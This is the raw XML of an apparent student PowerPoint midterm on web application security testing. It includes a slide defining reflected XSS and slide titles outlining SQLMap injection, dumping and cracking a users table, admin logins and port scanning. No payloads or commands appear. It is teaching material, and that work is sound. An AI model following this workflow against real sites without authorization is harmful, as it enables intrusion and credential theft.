            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="6452316" cy="5009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eaLnBrk="1" hangingPunct="1">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en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Cross-site scripting, XSS, allows an attacker to put their own code in the URL of your website and then run it when you access the website. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There is basically no limit of what it can access, cookies, session tokens, or even change the webpage to get your credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected Cross Site Scripting, this specific vulnerability, is where the injected code is reflected off of the web server, like an error message. They are typically delivered by email which has the altered URL already in it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/xss/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1179640776"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"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5F6F1"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="E5E5DB"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="C7C0B5"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="B9B5AA"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="212121"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="B7B7B7"/>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Minimalist Grayscale Pitch Deck XL by Slidesgo</Template>
  <TotalTime>1006</TotalTime>
  <Words>1114</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>163</Paragraphs>
  <Slides>44</Slides>
  <Notes>23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44</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="56" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Didact Gothic</vt:lpstr>
      <vt:lpstr>Julius Sans One</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Proxima Nova</vt:lpstr>
      <vt:lpstr>Proxima Nova Semibold</vt:lpstr>
      <vt:lpstr>Questrial</vt:lpstr>
      <vt:lpstr>Minimalist Grayscale Pitch Deck XL by Slidesgo</vt:lpstr>
      <vt:lpstr>Slidesgo Final Pages</vt:lpstr>
      <vt:lpstr>1_Slidesgo Final Pages</vt:lpstr>
      <vt:lpstr>2_Slidesgo Final Pages</vt:lpstr>
      <vt:lpstr>Midterm – Case Study INT4023</vt:lpstr>
      <vt:lpstr>Website Overview</vt:lpstr>
      <vt:lpstr>Landing Page</vt:lpstr>
      <vt:lpstr>Login Page</vt:lpstr>
      <vt:lpstr>OWASP ZAP</vt:lpstr>
      <vt:lpstr>OWASP Automated Scan</vt:lpstr>
      <vt:lpstr>Alerts found</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting – Example 1</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting – Example 2</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting – Example 3</vt:lpstr>
      <vt:lpstr>SQLMap - SQL Injection</vt:lpstr>
      <vt:lpstr>Found Information</vt:lpstr>
      <vt:lpstr>SQLMap - SQL Injection - azdummy</vt:lpstr>
      <vt:lpstr>azdummy Tables</vt:lpstr>
      <vt:lpstr>Azdummy Users – Dump + Crack</vt:lpstr>
      <vt:lpstr>azdummy Table 4 – Dump</vt:lpstr>
      <vt:lpstr>azdummy Movies – Dump</vt:lpstr>
      <vt:lpstr>SQLMap - SQL Injection – information_schema</vt:lpstr>
      <vt:lpstr>Information Schema Tables</vt:lpstr>
      <vt:lpstr>SQLMap - SQL Injection – information_schema – Dumps I found Interesting</vt:lpstr>
      <vt:lpstr>Information_schema - columns</vt:lpstr>
      <vt:lpstr>Information_schema - engines</vt:lpstr>
      <vt:lpstr>Information_schema – partitions</vt:lpstr>
      <vt:lpstr>Information_schema – plugins</vt:lpstr>
      <vt:lpstr>Information_schema – processlist</vt:lpstr>
      <vt:lpstr>Information_schema – schema_privileges</vt:lpstr>
      <vt:lpstr>Information_schema – tables</vt:lpstr>
      <vt:lpstr>Information_schema – user_privileges</vt:lpstr>
      <vt:lpstr>Information_schema – Unable to retrieve</vt:lpstr>
      <vt:lpstr>Additional vulnerability analysis</vt:lpstr>
      <vt:lpstr>Admin login</vt:lpstr>
      <vt:lpstr>Rcozart - Website Admin login</vt:lpstr>
      <vt:lpstr>Srai - Website Admin login</vt:lpstr>
      <vt:lpstr>Entered in movie - Website Admin login</vt:lpstr>
      <vt:lpstr>Additional database exploits</vt:lpstr>
      <vt:lpstr>Database Privileges</vt:lpstr>
      <vt:lpstr>Queries - Database</vt:lpstr>
      <vt:lpstr>Ports</vt:lpstr>
      <vt:lpstr>RustScan – Port scan</vt:lpstr>
      <vt:lpstr>How do we fix this?</vt:lpstr>
      <vt:lpstr>XSS (Reflected Cross Site Scripting)</vt:lpstr>
      <vt:lpstr>SQL Injection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Homework 1 Wireshark INT4023</dc:title>
  <dc:creator>Dalton Murray</dc:creator>
  <cp:lastModifiedBy>dalton murray</cp:lastModifiedBy>
  <cp:revision>250</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-15T21:20:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-01T18:52:34Z</dcterms:modified>
</cp:coreProperties>
</file>